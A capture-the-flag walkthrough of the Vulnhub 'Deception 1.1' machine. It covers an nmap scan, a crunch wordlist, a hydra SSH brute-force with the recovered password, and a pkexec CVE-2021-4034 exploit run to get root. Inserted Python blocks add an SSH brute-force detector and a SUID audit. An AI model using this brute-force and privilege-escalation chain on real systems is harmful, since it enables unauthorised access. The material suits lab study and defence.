
Deception 1.1

Description➡️


With that done, I unzipped the Deception file. Now let’s dig into it ⤵️

Let’s find the victim machine’s IP address ⤵️


IP : 10.0.2.41

Port Scan Results ⤵️


┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Deception1.1]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.0.2.41
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 21:59 IST
Nmap scan report for 10.0.2.41
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 75b393d4f10230bf35ea124e3be7fa4a (RSA)
|   256 f98c435b457dfe84b1f593a368bbce84 (ECDSA)
|_  256 772a333e8f2b65a5f3dfb5bc584af48e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:73:99:30 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration ⤵️


Now let’s test the password check with a reasonably complex password, for example ABD@3291#nano .

In return I got an alert like this ⬇️


with this message ⬇️


Now I guess that the file is “0000flagflagflagflag.php”, where flag=1, so the file name becomes ➡️ “00001111.php”

Let’s try it out now ⤵️


Source code ⬇️


I need to find the password.txt file that the alert on this page pointed me to. While enumerating, I found password.txt at this location ⤵️


Now let’s create a password.txt wordlist with the pattern ya5h followed by two lowercase letters (ya5h[a-z][a-z]) ⤵️

┌──(kali㉿kali)-[~/Downloads/Vulnhub/Deception1.1]
└─$ crunch 6 6 -t ya5h@@ -o password.txt              
Crunch will now generate the following amount of data: 4732 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 676 

crunch: 100% completed generating output

Now let’s brute-force the password for user yash with the hydra tool →

┌──(kali㉿kali)-[~/Downloads/Vulnhub/Deception1.1]
└─$ hydra -l yash -P password.txt ssh://10.0.2.85 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-03 11:15:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 676 login tries (l:1/p:676), ~11 tries per task
[DATA] attacking ssh://10.0.2.85:22/
[22][ssh] host: 10.0.2.85   login: yash   password: ya5hay
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 22 final worker threads did not complete until end.
[ERROR] 22 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-03 11:15:29
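A defender’s view of the run above, as an added example that is not part of the original post: a small Python detector over sshd auth.log lines that flags a source IP producing a burst of failed passwords and escalates the finding when a login from that IP then succeeds. The log lines, the attacker address 10.0.2.15 and the sshd PIDs in the sample are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd auth.log lines that matter here (constructed pattern for this example).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

def parse_line(line, year=2023):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=20, window_s=60):
    """Flag every source IP with >= threshold failed passwords inside any
    window_s-second span; a later success from that IP means 'compromised'."""
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    findings = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                f = findings.setdefault(ip, {"status": "bruteforce", "failures": 0, "users": set()})
                f["failures"] = max(f["failures"], len(recent[ip]))
                f["users"].add(user)
        elif result == "Accepted" and ip in findings:
            findings[ip]["status"] = "compromised"
            findings[ip]["accepted_user"] = user
    return findings

# Constructed sample: 30 parallel failures in six seconds, then the one guess
# that worked, plus an unrelated single failure that must not be flagged.
SAMPLE_LOG = [
    f"Dec  3 11:15:2{i // 5} haclabs sshd[{1000 + i}]: Failed password for yash "
    f"from 10.0.2.15 port {40000 + i} ssh2"
    for i in range(30)
] + [
    "Dec  3 11:15:29 haclabs sshd[1999]: Accepted password for yash from 10.0.2.15 port 40999 ssh2",
    "Dec  3 11:30:00 haclabs sshd[2100]: Failed password for invalid user admin from 10.0.2.7 port 5000 ssh2",
]
```

On a real host feed it the lines of /var/log/auth.log; the connection errors in the hydra output above are what sshd’s MaxStartups throttling of unauthenticated connections looks like from the attacker’s side, so a rate limit at the network edge plus this kind of alert covers both ends.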

I have the credentials for the yash user, so let’s log in →

yash : ya5hay

SSH Shell ⤵️

┌──(kali㉿kali)-[~/Downloads/Vulnhub/Deception1.1]
└─$ ssh yash@10.0.2.85     
The authenticity of host '10.0.2.85 (10.0.2.85)' can't be established.
ED25519 key fingerprint is SHA256:5fFIrbx9dprTzc1L8D0uqW8A+OlWNpClw43cf4Klki4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.85' (ED25519) to the list of known hosts.
yash@10.0.2.85's password: 
Linux haclabs 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 19 17:15:53 2020
yash@haclabs:~$ whoami
yash
yash@haclabs:~$ id
uid=1000(yash) gid=1000(yash) groups=1000(yash),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
yash@haclabs:~$

I found pkexec among the SUID binaries, so I checked its version and whether gcc and python3 are available. If the version is 0.105 it is vulnerable, and I have an exploit for that which can lead to root access →

yash@haclabs:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
yash@haclabs:~$ which python3
/usr/bin/python3
yash@haclabs:~$ which gcc
/usr/bin/gcc
yash@haclabs:~$ pkexec --version
pkexec version 0.105
yash@haclabs:~$ cd /tmp
yash@haclabs:/tmp$

That means I can try the exploit for CVE-2021-4034.
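An added audit helper for the privilege-escalation step above (this is not code from the original post): it lists setuid-root files missing from a baseline and checks whether the stop-gap for CVE-2021-4034, removing the setuid bit from pkexec, has been applied. The baseline is constructed from the find output above with pkexec deliberately left out so it gets surfaced, and the sample entries are constructed as well.

```python
import os
import stat

# Constructed baseline: the setuid-root files from the find output above, minus
# pkexec, which we want surfaced for review. On a real host derive the baseline
# from package manifests, never from the box being audited.
EXPECTED_SUID_ROOT = {
    "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/umount", "/usr/bin/mount", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

def is_suid_root(mode, uid):
    """Regular file, owned by root, with the setuid bit set."""
    return uid == 0 and stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def audit_suid(entries, baseline=EXPECTED_SUID_ROOT):
    """entries: iterable of (path, st_mode, st_uid). Returns the setuid-root
    paths that are not in the baseline, sorted, i.e. the ones to review."""
    return sorted(p for p, mode, uid in entries
                  if is_suid_root(mode, uid) and p not in baseline)

def pkexec_mitigated(mode):
    """CVE-2021-4034 is only reachable while pkexec runs setuid root, so
    chmod 0755 /usr/bin/pkexec is the stop-gap until the fixed package lands."""
    return not (mode & stat.S_ISUID)

def scan_filesystem(root="/"):
    """Yield (path, mode, uid) for regular files under root; unreadable
    directories are skipped, like the 2>/dev/null on the find above."""
    for dirpath, _, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid

# Constructed sample mirroring the victim: pkexec still mode 4755, an unexpected
# setuid-root binary in /usr/local, and a plain executable for contrast.
SAMPLE = [
    ("/usr/bin/su", 0o104755, 0),
    ("/usr/bin/pkexec", 0o104755, 0),
    ("/usr/local/bin/backup", 0o104755, 0),
    ("/tmp/expl.sh", 0o100755, 1000),
]
```

Run audit_suid(scan_filesystem()) on a live host to get the review list. A patched Debian package still prints pkexec version 0.105, so the version string seen above does not by itself prove the binary is vulnerable; check the package version with dpkg, or simply whether the setuid bit is still present.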

I transferred the exploit files with wget, and now it’s time to try the exploit →

yash@haclabs:/tmp$ 
yash@haclabs:/tmp$ ls
expl.sh
fake_module.c
helper.c
systemd-private-226a75322e014b62851f0e74e443ad31-apache2.service-ze9pxy
systemd-private-226a75322e014b62851f0e74e443ad31-systemd-timesyncd.service-jYzPAj
yash@haclabs:/tmp$ ./expl.sh 
Pwned!
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner),1000(yash)
# cd /root
# ls -al
total 36
drwx------  3 root root 4096 Mar 19  2020 .
drwxr-xr-x 18 root root 4096 Mar  9  2020 ..
-rw-------  1 root root  164 Mar 19  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root   38 Mar  9  2020 .lesshst
drwxr-xr-x  3 root root 4096 Mar  8  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Mar  9  2020 .selected_editor
-rw-r--r--  1 root root 1753 Mar 10  2020 root_flag.txt
# cat root_flag.txt
                _                                                          _           _                                             _                 _          
               (_)                                                        (_)         (_)                                         _ (_)             _ (_)         
       _  _  _ (_)  _  _  _  _      _  _  _  _  _  _  _    _  _  _  _   _ (_) _  _  _  _       _  _  _     _  _  _  _            (_)(_)            (_)(_)         
     _(_)(_)(_)(_) (_)(_)(_)(_)_  _(_)(_)(_)(_)(_)(_)(_)_ (_)(_)(_)(_)_(_)(_)(_)(_)(_)(_)   _ (_)(_)(_) _ (_)(_)(_)(_)_             (_)               (_)         
    (_)        (_)(_) _  _  _ (_)(_)       (_) _  _  _ (_)(_)        (_)  (_)         (_)  (_)         (_)(_)        (_)            (_)               (_)         
    (_)        (_)(_)(_)(_)(_)(_)(_)       (_)(_)(_)(_)(_)(_)        (_)  (_)     _   (_)  (_)         (_)(_)        (_)            (_)     _  _      (_)         
    (_)_  _  _ (_)(_)_  _  _  _  (_)_  _  _(_)_  _  _  _  (_) _  _  _(_)  (_)_  _(_)_ (_) _(_) _  _  _ (_)(_)        (_)          _ (_) _  (_)(_)   _ (_) _       
      (_)(_)(_)(_)  (_)(_)(_)(_)   (_)(_)(_) (_)(_)(_)(_) (_)(_)(_)(_)      (_)(_) (_)(_)(_)  (_)(_)(_)   (_)        (_)         (_)(_)(_) (_)(_)  (_)(_)(_)      
                                                          (_)                                                                                                     
                                                          (_)                                                                                                    

----------------------------------
Visit our website : https://www.haclabs.org
Submit walkthrough at : yash@haclabs.org
#

Now I am root!!

If you have any questions or suggestions, please leave a comment below. Thank You !

This post is licensed under CC BY 4.0 by the author.